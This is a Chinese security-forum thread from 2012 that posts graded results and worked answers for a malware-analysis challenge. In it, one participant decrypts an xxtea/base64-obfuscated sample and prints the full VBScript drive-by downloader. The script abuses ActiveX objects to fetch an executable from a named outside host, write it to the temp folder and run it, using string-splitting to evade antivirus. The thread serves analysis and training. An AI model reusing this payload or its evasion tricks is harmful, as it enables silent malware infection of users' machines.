卡饭 Hunter 公开招募 （结果和答案公示）

always

来晚了

疯狂的小鬼

人工置顶

zuoyefeng

突然想起来这里还有一件事情没有做，赶紧做哈，不过感觉纯体力活哈
争取截至日期之前提交答案：）

zuoyefeng

今天早上做到现在，做得我头晕，不弄了提交答案。
这次还是有收获哈，以前一直用IMDBG调脚本，找资料时才发现IE+VS调脚本确实很爽：）

疯狂的小鬼

14 楼成绩如下:

01） 1
02） 1
03） 0.5
04） 1
05） 0.5
06） 1
07） 0.2
08） 0.4
09） 0.3
10） 0.5

TOTAL：6.4/10
6 魅力 + 90 经验

疯狂的小鬼

zuoyefeng 发表于 2012-6-15 22:21
今天早上做到现在，做得我头晕，不弄了提交答案。
这次还是有收获哈，以前一直用IMDBG调脚本，找资料时才发 ...

你好, 请于此帖报道 :-)
http://bbs.kafan.cn/thread-1310761-1-1.html

sanhu35

帅就是帅 发表于 2012-5-31 14:45
1. 由正则表达式:修改代码如下:得样本地址:2. 由:修改代码如下:得:3. 对1>转义符清除(\x,\,%)(参数/无参数) ...

建议答案用红色字体标明，让不会的也可以很清楚的学习下！


03  这个过程不是很懂
知 xxtea + base64, 密钥为 1238kk, 得样本地址:
1.        http://jingliu.3322.org/smss.exe

04  中的shellcode貌似差点什么。

09 10对新手来说还有些难度。

帅就是帅

sanhu35 发表于 2012-6-19 08:57
建议答案用红色字体标明，让不会的也可以很清楚的学习下！

这里, 由最后的

1. t=utf8to16(xxtea_decrypt(base64decode(t),'1238kk'));

复制代码

知: 混淆方式为 xxtea, 密钥为 1238kk.
使用 Redoce 解密功能 P2>XXTEA解密 (需外{过}{滤}挂插件)
将前面 base64 的内容填在 "处理前", 填写密钥后 Decode (+Base64) 得到 "明文":

1. <script language="VBScript">
   
2. on error resume next
   
3. justurl = "http://jingliu.3322.org/smss.exe"
   
4. eeeeee="cls"+"i"+"d:B"+""+""+"D96"
   
5. gameeeeee="obj"+"ect"
   
6. easl="C556-65A3-"
   
7. just2="classid"
   
8. wertxxx=eeeeee & easl &"11D0-983A-00C04FC29E36"
   
9. just3="Micr"+"osoft.XMLHTTP"
   
10. just4="Shell.App"+"lication"
    
11. just5="Scrip"+"ting.File"+"SystemObject"
    
12. Set rootealsi = document.createElement(gameeeeee)
    
13. sub usicecod(just4,rootjust)
    
14. set justendif = rootealsi.createobject(just4,"")
    
15. justendif.ShellExEcutE rootkit,"","","open",0
    
16. end sub
    
17. rootealsi.setAttribute just2, wertxxx
    
18. chilam=just3
    
19. Set xiaozi = rootealsi.CreateObject(chilam,"")
    
20. User="andhi"
    
21. justxxxx="eam"
    
22. justxxx="Str"
    
23. justxx="Adodb."
    
24. queryeset = justxx & justxxx & justxxxx
    
25. fuckavast = queryeset
    
26. set justav360 = rootealsi.createobject(fuckavast,"")
    
27. justav360.type = 1
    
28. fuckavavav="GET"
    
29. xiaozi.Open fuckavavav, justurl, False
    
30. xiaozi.Send
    
31. rootkit="justju.sCr"
    
32. SeT shaduav = rootealsi.createobject(just5,"")
    
33. sET justendif = shaduav.GetSpecialFolder(2)
    
34. justav360.open
    
35. rootkit= shaduav.BuildPath(justendif,rootkit)
    
36. justav360.write xiaozi.responseBody
    
37. justav360.savetofile rootkit,2
    
38. justav360.close
    
39. call usicecod(just4,rootjust)
    
40. </script>

复制代码

^_^

sanhu35

帅就是帅 发表于 2012-6-19 09:48
这里, 由最后的知: 混淆方式为 xxtea, 密钥为 1238kk.
使用 Redoce 解密功能 P2>XXTEA解密 (需外{过}{滤 ...

本来想简单标记下，帮你发上来的，哦 结果丢失了！

sanhu35

帅就是帅 发表于 2012-6-19 09:48
这里, 由最后的知: 混淆方式为 xxtea, 密钥为 1238kk.
使用 Redoce 解密功能 P2>XXTEA解密 (需外{过}{滤 ...

有几个我帮你补充一下，有时间了发上来。

有几个确实是我这种工具流不会的。！！